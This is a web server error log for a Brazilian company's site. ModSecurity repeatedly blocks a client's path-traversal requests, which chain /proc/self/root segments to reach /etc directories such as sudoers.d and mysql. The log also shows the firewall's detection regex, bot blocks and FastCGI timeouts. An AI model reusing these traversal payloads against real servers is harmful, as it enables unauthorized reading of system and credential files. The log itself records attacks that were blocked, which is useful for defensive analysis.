[Thu Mar 19 15:11:08.274454 2026] [:error] [pid 8307:tid 140411666392832] [client 74.7.243.128:47150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8PL-FhjpZGs9ba8qLPgAAAwk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:11:17.643342 2026] [:error] [pid 21563:tid 140411716749056] [client 74.7.243.128:55654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8RUpm7ZmxKZTM4bZk2gAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:11:19.173778 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:11:24.602048 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:37190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8TAkwaGbbGflqUZDqtwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:11:30.335174 2026] [:error] [pid 21563:tid 140411733534464] [client 74.7.243.128:55578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8Ukpm7ZmxKZTM4bZk3AAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:11:34.989928 2026] [:error] [pid 20435:tid 140411565680384] [client 74.7.243.128:55584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8VpJaM1-0uhhUQJM6TAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:11:40.633803 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:45016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8XPqxLDW4GITHUkSJXAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:11:41.733949 2026] [proxy_fcgi:error] [pid 7235:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:11:52.948741 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:45032] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8aOoXxyEfFpUF8f8tDgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:12:06.625823 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60176] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:12:15.928695 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.243.128:47020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8f_u8EFLIOrSqIpvJEQAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 15:12:30.129772 2026] [proxy_fcgi:error] [pid 7545:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:12:47.701219 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.103:36240] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:12:52.124153 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33184] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:12:58.245763 2026] [core:alert] [pid 21219:tid 140411582465792] [client 57.141.18.8:36530] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:13:12.951158 2026] [:error] [pid 19655:tid 140411683178240] [client 74.7.228.61:47646] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw8uE1ujooLWdUDGy70XQAAAEc"]
[Thu Mar 19 15:13:14.135810 2026] [proxy_fcgi:error] [pid 19655:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:13:14.525610 2026] [:error] [pid 19655:tid 140411557287680] [client 74.7.244.43:45568] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw8uk1ujooLWdUDGy70YQAAAFY"]
[Thu Mar 19 15:13:44.130076 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:13:49.272434 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:51414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw83da6ubjKNq_cu4Z3pAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:13:57.518579 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:43368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw85eoXxyEfFpUF8f8tNgAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:13:58.029705 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:43368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw85uoXxyEfFpUF8f8tNwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:14:11.133879 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35048] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:14:27.632392 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:43368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw9A-oXxyEfFpUF8f8tSwAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:14:33.037794 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35502] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:14:37.011979 2026] [:error] [pid 19655:tid 140411574073088] [client 74.7.243.128:34486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw9DU1ujooLWdUDGy70mAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 15:14:42.700530 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.243.128:41712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw9Ev-YZRR_7pZ7nDKr_AAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:15:01.201890 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36082] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:15:33.153790 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:15:47.679116 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:59146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw9U9a6ubjKNq_cu4Z3zAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:16:01.138391 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37734] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:16:29.654668 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:60656] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw9fRCii7xarUs8iHYKdAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 15:16:30.029810 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:16:54.129844 2026] [proxy_fcgi:error] [pid 7545:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:17:18.161792 2026] [proxy_fcgi:error] [pid 7893:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40176] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:17:22.874517 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:36454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw9suoXxyEfFpUF8f8tdwAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:17:29.177026 2026] [mime_magic:error] [pid 15826:tid 140411574073088] (70014)End of file found: [client 57.141.18.76:42718] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:17:40.133774 2026] [proxy_fcgi:error] [pid 8307:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40874] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:18:02.729826 2026] [proxy_fcgi:error] [pid 7545:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41454] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:18:17.103634 2026] [:error] [pid 21563:tid 140411708356352] [client 74.7.244.43:46206] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw96Epm7ZmxKZTM4bZlZQAAA4Q"]
[Thu Mar 19 15:18:17.106365 2026] [:error] [pid 21563:tid 140411733534464] [client 74.7.228.61:36370] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw96Upm7ZmxKZTM4bZlaQAAA4E"]
[Thu Mar 19 15:18:25.121986 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:18:49.037836 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42592] AH01075: Error dispatching request to : (polling)
